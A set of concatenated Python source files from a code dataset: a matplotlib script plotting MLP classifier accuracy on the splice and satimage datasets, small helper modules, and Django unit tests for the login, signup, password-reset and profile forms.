plt.text(x - 0.02, y1, '%.2f' % y1, ha='center', va='bottom')
plt.text(x + width + 0.05, y2, '%.2f' % y2, ha='center', va='bottom')
ax = plt.gca()
ax.set_xticks(x_ax + width / 2)
ax.set_xticklabels((0.001, 0.003, 0.006, 0.01, 0.03, 0.06, 0.1))
plt.xlabel('Learning rate')
plt.ylabel('Accuracy')
plt.ylim(0, 1.06)
plt.legend()
plt.savefig('report/img/mlp_lr_sat')
plt.show()
def plot_dim_splice():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=i,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_25_tr = [0.665, 0.727, 0.769, 0.792, 0.815, 0.832, 0.841, 0.853, 0.865, 0.876]
y_5_tr = [0.541, 0.727, 0.814, 0.833, 0.854, 0.864, 0.876, 0.887, 0.899, 0.909]
y_75_tr = [0.524, 0.712, 0.811, 0.858, 0.891, 0.914, 0.932, 0.956, 0.964, 0.974]
y_tr = [0.698, 0.764, 0.813, 0.845, 0.865, 0.884, 0.906, 0.921, 0.921, 0.921]
y_25_t = [0.392, 0.443, 0.486, 0.525, 0.55, 0.562, 0.573, 0.574, 0.575, 0.58]
y_5_t = [0.541, 0.727, 0.814, 0.833, 0.854, 0.864, 0.876, 0.887, 0.899, 0.909]
y_75_t = [0.522, 0.564, 0.56, 0.569, 0.571, 0.571, 0.576, 0.586, 0.586, 0.582]
y_t = [0.68, 0.759, 0.822, 0.85, 0.857, 0.867, 0.874, 0.883, 0.883, 0.883]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_25_tr, color='#90EE90', linewidth=1.7, label='25% features')
ax.plot(x, y_5_tr, color='#ffa07a', linewidth=1.7, label='50% features')
ax.plot(x, y_75_tr, color='#9999ff', linewidth=1.7, label='75% features')
ax.plot(x, y_tr, color='#F0E68C', linewidth=1.7, label='100% features')
ax.scatter(x, y_25_tr, s=13, c='#90EE90')
ax.scatter(x, y_5_tr, s=13, c='#ffa07a')
ax.scatter(x, y_75_tr, s=13, c='#9999ff')
ax.scatter(x, y_tr, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_dim_splice_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_25_t, color='#90EE90', linewidth=1.7, label='25% features')
ax.plot(x, y_5_t, color='#ffa07a', linewidth=1.7, label='50% features')
ax.plot(x, y_75_t, color='#9999ff', linewidth=1.7, label='75% features')
ax.plot(x, y_t, color='#F0E68C', linewidth=1.7, label='100% features')
ax.scatter(x, y_25_t, s=13, c='#90EE90')
ax.scatter(x, y_5_t, s=13, c='#ffa07a')
ax.scatter(x, y_75_t, s=13, c='#9999ff')
ax.scatter(x, y_t, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_dim_splice_t')
plt.show()
def plot_dim_sat():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=i,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_25_tr = [0.413, 0.44, 0.489, 0.681, 0.79, 0.8, 0.809, 0.815, 0.823, 0.826]
y_5_tr = [0.174, 0.396, 0.477, 0.649, 0.769, 0.776, 0.792, 0.806, 0.823, 0.832]
y_75_tr = [0.342, 0.406, 0.412, 0.416, 0.453, 0.504, 0.742, 0.754, 0.763, 0.798]
y_tr = [0.15, 0.455, 0.816, 0.834, 0.845, 0.847, 0.854, 0.86, 0.862, 0.866]
y_25_t = [0.384, 0.424, 0.482, 0.604, 0.683, 0.68, 0.669, 0.664, 0.664, 0.662]
y_5_t = [0.235, 0.3, 0.354, 0.536, 0.604, 0.574, 0.57, 0.568, 0.575, 0.583]
y_75_t = [0.322, 0.372, 0.382, 0.432, 0.452, 0.464, 0.462, 0.469, 0.487, 0.522]
y_t = [0.17, 0.445, 0.777, 0.788, 0.796, 0.795, 0.806, 0.812, 0.814, 0.814]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_25_tr, color='#90EE90', linewidth=1.7, label='25% features')
ax.plot(x, y_5_tr, color='#ffa07a', linewidth=1.7, label='50% features')
ax.plot(x, y_75_tr, color='#9999ff', linewidth=1.7, label='75% features')
ax.plot(x, y_tr, color='#F0E68C', linewidth=1.7, label='100% features')
ax.scatter(x, y_25_tr, s=13, c='#90EE90')
ax.scatter(x, y_5_tr, s=13, c='#ffa07a')
ax.scatter(x, y_75_tr, s=13, c='#9999ff')
ax.scatter(x, y_tr, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_dim_sat_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_25_t, color='#90EE90', linewidth=1.7, label='25% features')
ax.plot(x, y_5_t, color='#ffa07a', linewidth=1.7, label='50% features')
ax.plot(x, y_75_t, color='#9999ff', linewidth=1.7, label='75% features')
ax.plot(x, y_t, color='#F0E68C', linewidth=1.7, label='100% features')
ax.scatter(x, y_25_t, s=13, c='#90EE90')
ax.scatter(x, y_5_t, s=13, c='#ffa07a')
ax.scatter(x, y_75_t, s=13, c='#9999ff')
ax.scatter(x, y_t, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_dim_sat_t')
plt.show()
def plot_archi_sat():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=i,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
# 1: (10, 10)
# 2: (10, 10, 10, 10)
# 3: (50, 50)
# 4: (50, 50, 50, 50)
x = list(range(interval, max_iter + 1, interval))
y_1_tr = [0.15, 0.455, 0.816, 0.834, 0.845, 0.847, 0.854, 0.86, 0.862, 0.866]
y_2_tr = [0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257]
y_3_tr = [0.679, 0.729, 0.743, 0.756, 0.762, 0.769, 0.847, 0.858, 0.871, 0.901]
y_4_tr = [0.337, 0.558, 0.558, 0.611, 0.652, 0.652, 0.652, 0.652, 0.652, 0.652]
y_1_t = [0.17, 0.445, 0.777, 0.788, 0.796, 0.795, 0.806, 0.812, 0.814, 0.814]
y_2_t = [0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198]
y_3_t = [0.652, 0.714, 0.719, 0.723, 0.726, 0.727, 0.779, 0.79, 0.814, 0.83]
y_4_t = [0.279, 0.484, 0.476, 0.552, 0.606, 0.606, 0.606, 0.606, 0.606, 0.606]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_1_tr, color='#90EE90', linewidth=1.7, label='(10, 10)')
ax.plot(x, y_2_tr, color='#ffa07a', linewidth=1.7, label='(10, 10, 10, 10)')
ax.plot(x, y_3_tr, color='#9999ff', linewidth=1.7, label='(50, 50)')
ax.plot(x, y_4_tr, color='#F0E68C', linewidth=1.7, label='(50, 50, 50, 50)')
ax.scatter(x, y_1_tr, s=13, c='#90EE90')
ax.scatter(x, y_2_tr, s=13, c='#ffa07a')
ax.scatter(x, y_3_tr, s=13, c='#9999ff')
ax.scatter(x, y_4_tr, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.ylim(0, 0.97)
plt.legend()
plt.savefig('report/img/mlp_archi_sat_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_1_t, color='#90EE90', linewidth=1.7, label='(10, 10)')
ax.plot(x, y_2_t, color='#ffa07a', linewidth=1.7, label='(10, 10, 10, 10)')
ax.plot(x, y_3_t, color='#9999ff', linewidth=1.7, label='(50, 50)')
ax.plot(x, y_4_t, color='#F0E68C', linewidth=1.7, label='(50, 50, 50, 50)')
ax.scatter(x, y_1_t, s=13, c='#90EE90')
ax.scatter(x, y_2_t, s=13, c='#ffa07a')
ax.scatter(x, y_3_t, s=13, c='#9999ff')
ax.scatter(x, y_4_t, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.ylim(0, 0.92)
plt.legend()
plt.savefig('report/img/mlp_archi_sat_t')
plt.show()
def plot_archi_splice():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=i,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
# 1: (10, 10)
# 2: (10, 10, 10, 10)
# 3: (50, 50)
# 4: (50, 50, 50, 50)
x = list(range(interval, max_iter + 1, interval))
y_1_tr = [0.698, 0.764, 0.813, 0.845, 0.865, 0.884, 0.906, 0.921, 0.921, 0.921]
y_2_tr = [0.616, 0.691, 0.779, 0.827, 0.838, 0.858, 0.86, 0.86, 0.86, 0.86]
y_3_tr = [0.483, 0.483, 0.483, 0.483, 0.483, 0.483, 0.483, 0.483, 0.483, 0.483]
y_4_tr = [0.785, 0.867, 0.914, 0.969, 0.992, 1.0, 1.0, 1.0, 1.0, 1.0]
y_1_t = [0.68, 0.759, 0.822, 0.85, 0.857, 0.867, 0.874, 0.883, 0.883, 0.883]
y_2_t = [0.608, 0.687, 0.775, 0.816, 0.835, 0.843, 0.842, 0.842, 0.842, 0.842]
y_3_t = [0.48, 0.48, 0.48, 0.48, 0.48, 0.48, 0.48, 0.48, 0.48, 0.48]
y_4_t = [0.76, 0.83, 0.844, 0.844, 0.849, 0.842, 0.841, 0.844, 0.844, 0.844]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_1_tr, color='#90EE90', linewidth=1.7, label='(10, 10)')
ax.plot(x, y_2_tr, color='#ffa07a', linewidth=1.7, label='(10, 10, 10, 10)')
ax.plot(x, y_3_tr, color='#9999ff', linewidth=1.7, label='(50, 50)')
ax.plot(x, y_4_tr, color='#F0E68C', linewidth=1.7, label='(50, 50, 50, 50)')
ax.scatter(x, y_1_tr, s=13, c='#90EE90')
ax.scatter(x, y_2_tr, s=13, c='#ffa07a')
ax.scatter(x, y_3_tr, s=13, c='#9999ff')
ax.scatter(x, y_4_tr, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_archi_splice_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_1_t, color='#90EE90', linewidth=1.7, label='(10, 10)')
ax.plot(x, y_2_t, color='#ffa07a', linewidth=1.7, label='(10, 10, 10, 10)')
ax.plot(x, y_3_t, color='#9999ff', linewidth=1.7, label='(50, 50)')
ax.plot(x, y_4_t, color='#F0E68C', linewidth=1.7, label='(50, 50, 50, 50)')
ax.scatter(x, y_1_t, s=13, c='#90EE90')
ax.scatter(x, y_2_t, s=13, c='#ffa07a')
ax.scatter(x, y_3_t, s=13, c='#9999ff')
ax.scatter(x, y_4_t, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.ylim(0, 0.92)
plt.legend()
plt.savefig('report/img/mlp_archi_splice_t')
plt.show()
def plot_baseline():
x = list(range(interval, max_iter + 1, interval))
y_tr_splice = [0.837, 0.861, 0.888, 0.9, 0.935, 0.947, 0.965, 0.981, 0.988, 0.995]
y_tr_sat = [0.834, 0.862, 0.879, 0.892, 0.899, 0.905, 0.913, 0.919, 0.924, 0.93]
y_t_splice = [0.828, 0.849, 0.857, 0.851, 0.867, 0.874, 0.883, 0.886, 0.887, 0.891]
y_t_sat = [0.816, 0.831, 0.838, 0.854, 0.862, 0.865, 0.868, 0.872, 0.872, 0.875]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_splice, color='#9999ff', linewidth=1.7, label='Training set')
ax.plot(x, y_t_splice, color='#ffa07a', linewidth=1.7, label='Testing set')
ax.scatter(x, y_tr_splice, s=13, c='#9999ff')
ax.scatter(x, y_t_splice, s=13, c='#ffa07a')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_baseline_splice')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_sat, color='#9999ff', linewidth=1.7, label='Training set')
ax.plot(x, y_t_sat, color='#ffa07a', linewidth=1.7, label='Testing set')
ax.scatter(x, y_tr_sat, s=13, c='#9999ff')
ax.scatter(x, y_t_sat, s=13, c='#ffa07a')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_baseline_sat')
plt.show()
################################### MLP Part #####################################
if __name__ == '__main__':
# splice satimage.scale
## MLP ##
#mlp('satimage.scale')
#mlp('splice')
plot_baseline()
## SVM ##
#svm('satimage.scale')
#svm('splice')
#plot_s_baseline()
| 45.970218
| 104
| 0.588034
| 7,554
| 40,132
| 2.996029
| 0.082473
| 0.017144
| 0.029692
| 0.033934
| 0.837443
| 0.82644
| 0.818443
| 0.813097
| 0.80775
| 0.805541
| 0
| 0.195736
| 0.196975
| 40,132
| 873
| 105
| 45.970218
| 0.506532
| 0.114422
| 0
| 0.717391
| 0
| 0
| 0.12713
| 0.025887
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031884
| false
| 0
| 0.010145
| 0
| 0.044928
| 0.007246
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a5801c718236d84035c0ddf26eeb9e5f8f5dd59
| 47
|
py
|
Python
|
snakeeyes/blueprints/bet/__init__.py
|
MDRCS/software-as-service
|
a34ab152ada280c4b3630f5f38fcd33f75903d5e
|
[
"MIT"
] | null | null | null |
snakeeyes/blueprints/bet/__init__.py
|
MDRCS/software-as-service
|
a34ab152ada280c4b3630f5f38fcd33f75903d5e
|
[
"MIT"
] | 1
|
2020-04-07T06:27:23.000Z
|
2020-04-07T06:27:23.000Z
|
snakeeyes/blueprints/bet/__init__.py
|
MDRCS/software-as-service
|
a34ab152ada280c4b3630f5f38fcd33f75903d5e
|
[
"MIT"
] | 1
|
2020-05-02T13:51:52.000Z
|
2020-05-02T13:51:52.000Z
|
from snakeeyes.blueprints.bet.views import bet
| 23.5
| 46
| 0.851064
| 7
| 47
| 5.714286
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 47
| 1
| 47
| 47
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
1a68007423554ddc13f9f05b84740b8ead8c9572
| 282
|
py
|
Python
|
zabbix_libvirt/errors.py
|
CCI-MOC/zabbix-kvm
|
7e31af29478e053a00ace89a5e2e201535a2f279
|
[
"Apache-2.0"
] | null | null | null |
zabbix_libvirt/errors.py
|
CCI-MOC/zabbix-kvm
|
7e31af29478e053a00ace89a5e2e201535a2f279
|
[
"Apache-2.0"
] | null | null | null |
zabbix_libvirt/errors.py
|
CCI-MOC/zabbix-kvm
|
7e31af29478e053a00ace89a5e2e201535a2f279
|
[
"Apache-2.0"
] | null | null | null |
"""Exceptions"""
class LibvirtConnectionError(Exception):
"""Error to indicate something went wrong with the LibvirtConnection class"""
pass
class DomainNotFoundError(Exception):
"""Error to indicate something went wrong with the LibvirtConnection class"""
pass
| 23.5
| 81
| 0.748227
| 29
| 282
| 7.275862
| 0.517241
| 0.132701
| 0.151659
| 0.227488
| 0.7109
| 0.7109
| 0.7109
| 0.7109
| 0.7109
| 0.7109
| 0
| 0
| 0.166667
| 282
| 11
| 82
| 25.636364
| 0.897872
| 0.546099
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
1a84ec1c212c6078ecd82fa0f8ccb9f632b274f9
| 63
|
py
|
Python
|
src/utils/uuid.py
|
0x7FFFFF/asoul-remark
|
09e02a0dce63fe5a426bde8c23e9be8a07d9201a
|
[
"MIT"
] | null | null | null |
src/utils/uuid.py
|
0x7FFFFF/asoul-remark
|
09e02a0dce63fe5a426bde8c23e9be8a07d9201a
|
[
"MIT"
] | 1
|
2021-11-20T14:59:20.000Z
|
2021-11-20T14:59:20.000Z
|
src/utils/uuid.py
|
0x7FFFFF/asoul-mark
|
09e02a0dce63fe5a426bde8c23e9be8a07d9201a
|
[
"MIT"
] | null | null | null |
import uuid
def generate_uuid():
return uuid.uuid4().hex
| 10.5
| 27
| 0.698413
| 9
| 63
| 4.777778
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.190476
| 63
| 5
| 28
| 12.6
| 0.823529
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
1ac1a4667b1ddf53ab4cfe98469d5ecad70a5f7b
| 32
|
py
|
Python
|
yaddi-yaddi-yadda-yeet.py
|
Davidwan98/yaddi-yaddi-yadda-yeet
|
2ded448ba75b2389d3eb496cc4c416fa45dac248
|
[
"MIT"
] | null | null | null |
yaddi-yaddi-yadda-yeet.py
|
Davidwan98/yaddi-yaddi-yadda-yeet
|
2ded448ba75b2389d3eb496cc4c416fa45dac248
|
[
"MIT"
] | null | null | null |
yaddi-yaddi-yadda-yeet.py
|
Davidwan98/yaddi-yaddi-yadda-yeet
|
2ded448ba75b2389d3eb496cc4c416fa45dac248
|
[
"MIT"
] | null | null | null |
print("yaddi-yaddi-yadda-yeet")
| 16
| 31
| 0.75
| 5
| 32
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 32
| 1
| 32
| 32
| 0.774194
| 0
| 0
| 0
| 0
| 0
| 0.6875
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
46dd28cc32c415376aeebccaf11b60fb92b2f572
| 13,293
|
py
|
Python
|
code/glucocheck/homepage/tests/test_unit_tests/test_forms.py
|
kmcgreg5/Glucocheck
|
4ab4ada7f967ae41c1241c94523d14e693e05dd4
|
[
"FSFAP"
] | null | null | null |
code/glucocheck/homepage/tests/test_unit_tests/test_forms.py
|
kmcgreg5/Glucocheck
|
4ab4ada7f967ae41c1241c94523d14e693e05dd4
|
[
"FSFAP"
] | null | null | null |
code/glucocheck/homepage/tests/test_unit_tests/test_forms.py
|
kmcgreg5/Glucocheck
|
4ab4ada7f967ae41c1241c94523d14e693e05dd4
|
[
"FSFAP"
] | null | null | null |
from homepage.tests.test_unit_tests.classes import UnitTestForm
from homepage.forms import LoginForm, EmailInputForm, ResetPasswordForm, SignupForm, UserProfileForm
from django.contrib.auth.models import User
from datetime import date
class TestLoginForm(UnitTestForm):
'''Sets up a clean database, initializes test data, and runs tests on the login form.
Public methods:
setUpTestData -- Initializes test data
test_correct_login -- Tests form validity when given correct credentials
test_incorrect_login -- Tests form validity when given incorrect credentials
test_unathenticated_user -- Tests form validity when given credentials to an unauthenticated user
'''
@classmethod
def setUpTestData(cls):
'''Creates users for testing.
Keyword arguments:
cls -- the TestLoginForm class
'''
User.objects.create_user(username='someUser', password='somePassword')
User.objects.create_user(username='unAuthUser', password='somePassword', is_active=False)
def test_correct_login(self):
'''Tests form validity when given the correct credentials.
Keyword arguments:
self -- the TestLoginForm object
'''
user_login = LoginForm(data={'username':'someUser', 'password':'somePassword'})
self.assertTrue(user_login.is_valid())
def test_incorrect_login(self):
'''Tests the expected form error and the number of errors present when given incorrect credentials.
Keyword arguments:
self -- the TestLoginForm object
'''
user_login = LoginForm(data={'username':'someUser', 'password':'wrongPassword'})
num_errors = self._get_num_errors(user_login)
form_error = user_login.errors.as_data()['__all__'][0].message
self.assertTrue(form_error == "Your username OR password is incorrect" and num_errors == 1)
def test_unathenticated_user(self):
'''Tests the expected form error and the number of errors present when given credentials to an unauthenticated user.
Keyword arguments:
self -- the TestLoginForm object
'''
user_login = LoginForm(data={'username':'unAuthUser', 'password':'somePassword'})
num_errors = self._get_num_errors(user_login)
form_error = user_login.errors.as_data()['__all__'][0].message
self.assertTrue(form_error == "Your account is not authenticated, please click the link in your email" and num_errors == 1)
class TestEmailInputForm(UnitTestForm):
'''Sets up a clean database, initializes test data, and runs tests on the email input form.
Public methods:
setUpTestData -- Initializes test data
test_correct_email -- Tests form validity when given an email associated with a user
test_wrong_email -- Tests form validity when given an email not associated with a user
test_bad_format_email -- Tests form validity when given an improperly formatted email
'''
@classmethod
def setUpTestData(cls):
'''Creates users for testing.
Keyword arguments:
cls -- the TestEmailInputForm class
'''
User.objects.create_user(username='someUser', password='somePassword', email='email@gmail.com')
def test_correct_email(self):
'''Tests form validity when given an email associated with a user.
Keyword arguments:
self -- the TestEmailInputForm object
'''
email_input = EmailInputForm(data={'email':'email@gmail.com'})
self.assertTrue(email_input.is_valid())
def test_wrong_email(self):
'''Tests the expected form error and the number of errors present when given an email not associated with a user.
Keyword arguments:
self -- the TestEmailInputForm object
'''
email_input = EmailInputForm(data={'email':'wrongEmail@gmail.com'})
num_errors = self._get_num_errors(email_input)
form_error = email_input.errors.as_data()['email'][0].message
self.assertTrue(form_error == "This email is not associated with a user" and num_errors == 1)
def test_bad_format_email(self):
'''Tests the expected form error and the number of errors present when given an improperly formatted email.
Keyword arguments:
self -- the TestEmailInputForm object
'''
email_input = EmailInputForm(data={'email':'notAnEmail'})
num_errors = self._get_num_errors(email_input)
form_error = email_input.errors.as_data()['email'][0].message
self.assertTrue(form_error == "Enter a valid email address." and num_errors == 1)
class TestResetPasswordForm(UnitTestForm):
'''Sets up a clean database, initializes test data, and runs tests on the reset password form.
Public methods:
test_correct_passwords -- Tests form validity when matching and secure passwords
test_mismatching_passwords -- Tests form validity when given mismatching passwords
test_insecure_password -- Tests form validity when given insecure passwords
'''
def test_correct_passwords(self):
'''Tests form validity when given matching and secure passwords.
Keyword arguments:
self -- the TestResetPasswordForm object
'''
password_input = ResetPasswordForm(data={'password1':'somePassword1', 'password2':'somePassword1'})
self.assertTrue(password_input.is_valid())
def test_mismatching_passwords(self):
'''Tests the expected form error and the number of errors present when given mismatching passwords.
Keyword arguments:
self -- the TestResetPasswordForm object
'''
password_input = ResetPasswordForm(data={'password1':'somePassword1', 'password2':'anotherPassword1'})
num_errors = self._get_num_errors(password_input)
form_error = password_input.errors.as_data()['__all__'][0].message
self.assertTrue(form_error == "The two password fields didn’t match." and num_errors == 1)
def test_insecure_password(self):
'''Tests the expected form error and the number of errors present when given insecure passwords.
Passwords are insecure if they do not include at least 1 lowercase letter, 1 uppercase letter, and 1 number
Keyword arguments:
self -- the TestResetPasswordForm object
'''
password_input = ResetPasswordForm(data={'password1':'somepassword', 'password2':'somepassword'})
num_errors = self._get_num_errors(password_input)
form_error = password_input.errors.as_data()['__all__'][0].message
self.assertTrue(form_error == 'Your password must be at least 6 letters long and contain at least one uppercase letter, one lowercase letter, and one digit' and num_errors == 1)
class TestSignupForm(UnitTestForm):
'''Sets up a clean database, initializes test data, and runs tests on the signup form.
Public methods:
setUpTestData -- Initializes test data
test_correct_input -- Tests form validity when given correct input
test_incorrect_username -- Tests form validity when given a username already associated with a user
test_incorrect_email -- Tests form validity when given an email already associated with a user
test_bad_format_email -- Tests form validity when given an improperly formatted email
test_mismatching_passwords -- Tests form validity when given mismatching passwords
'''
@classmethod
def setUpTestData(cls):
'''Creates users for testing.
Keyword arguments:
cls -- the TestSignupForm class
'''
User.objects.create_user(username='wrongUser', email='wrong@gmail.com', password='somePassword')
def test_correct_input(self):
'''Tests form validity when given correct input.
Keyword arguments:
self -- the TestSignupForm object
'''
username_input = SignupForm(data ={'username' : 'username', 'email':'test@gmail.com','password1': 'testPassword1','password2':'testPassword1'})
self.assertTrue(username_input.is_valid())
def test_incorrect_username(self):
'''Tests the expected form error and the number of errors present when given a username already associated with a user.
Keyword arguments:
self -- the TestSignupForm object
'''
username_input = SignupForm(data ={'username' : 'wrongUser', 'email':'test@gmail.com','password1': 'testPassword1','password2':'testPassword1'})
num_errors = self._get_num_errors(username_input)
form_error = username_input.errors.as_data()['username'][0].message
self.assertTrue(form_error == "A user with that username already exists." and num_errors == 1)
def test_incorrect_email(self):
'''Tests the expected form error and the number of errors present when given an email already associated with a user.
Keyword arguments:
self -- the TestSignupForm object
'''
signup_email_input = SignupForm(data ={'username' : 'username', 'email':'wrong@gmail.com','password1': 'testPassword1','password2':'testPassword1'})
num_error = self._get_num_errors(signup_email_input)
form_error = signup_email_input.errors.as_data()['email'][0].message
self.assertTrue(form_error == 'A user with that email already exists' and num_error ==1)
def test_bad_format_email(self):
'''Tests the expected form error and the number of errors present when given an improperly formatted email.
Keyword arguments:
self -- the TestSignupForm object
'''
signup_email_input = SignupForm(data ={'username' : 'username', 'email':'notAnEmail','password1': 'testPassword1','password2':'testPassword1'})
num_errors = self._get_num_errors(signup_email_input)
form_error = signup_email_input.errors.as_data()['email'][0].message
self.assertTrue(form_error == "Enter a valid email address." and num_errors == 1)
def test_mismatching_passwords(self):
'''Tests the expected form error and the number of errors present when given mismatching passwords.
Keyword arguments:
self -- the TestSignupForm object
'''
signup_password_input = SignupForm(data ={'username' : 'username', 'email':'test@gmail.com','password1': 'somePassword1','password2':'anotherPassword1'})
num_errors = self._get_num_errors(signup_password_input)
form_error = signup_password_input.errors.as_data()['password2'][0].message
self.assertTrue(form_error == "The two password fields didn’t match." and num_errors == 1)
def test_insecure_password(self):
'''Tests the expected form error and the number of errors present when given insecure passwords.
Passwords are insecure if they do not include at least 1 lowercase letter, 1 uppercase letter, and 1 number
Keyword arguments:
self -- the TestSignupForm object
'''
signup_password_input = SignupForm(data ={'username' : 'username', 'email':'test@gmail.com','password1': 'insecurePassword','password2':'insecurePassword'})
num_errors = self._get_num_errors(signup_password_input)
form_error = signup_password_input.errors.as_data()['__all__'][0].message
self.assertTrue(form_error == 'Your password must be at least 6 letters long and contain at least one uppercase letter, one lowercase letter, and one digit' and num_errors == 1)
class TestUserProfileForm(UnitTestForm):
'''Sets up a clean database, initializes test data, and runs tests on the user profile form.
Public methods:
test_correct_birth_date -- Tests form validity when given a birth date signifying an age of over 18 years
test_incorrect_birth_date -- Tests form validity when given a birth date signifying an age of under 18 years
'''
def test_correct_birth_date(self):
'''Tests form validity when given a birth date signifying an age of over 18 years.
Keyword arguments:
self -- the TestUserProfileForm object
'''
birth_date = date.today()
birth_date = birth_date.replace(year=date.today().year - 19)
birth_date_input = UserProfileForm(data ={'birth_date':birth_date, 'state': 'New Jersey','signup_confirmation':True})
self.assertTrue(birth_date_input.is_valid())
def test_incorrect_birth_date(self):
'''Tests the expected form error and the number of errors present when given a birth date signifying an age of under 18 years.
Keyword arguments:
self -- the TestUserProfileForm object
'''
birth_date = date.today()
birth_date = birth_date.replace(year=date.today().year - 17)
birth_date_input = UserProfileForm(data ={'birth_date':birth_date, 'state': 'New Jersey','signup_confirmation':True})
num_errors = self._get_num_errors(birth_date_input)
form_error = birth_date_input.errors.as_data()['birth_date'][0].message
self.assertTrue(form_error == 'Must be at least 18 years old to register' and num_errors == 1)
| 49.051661
| 185
| 0.692319
| 1,610
| 13,293
| 5.543478
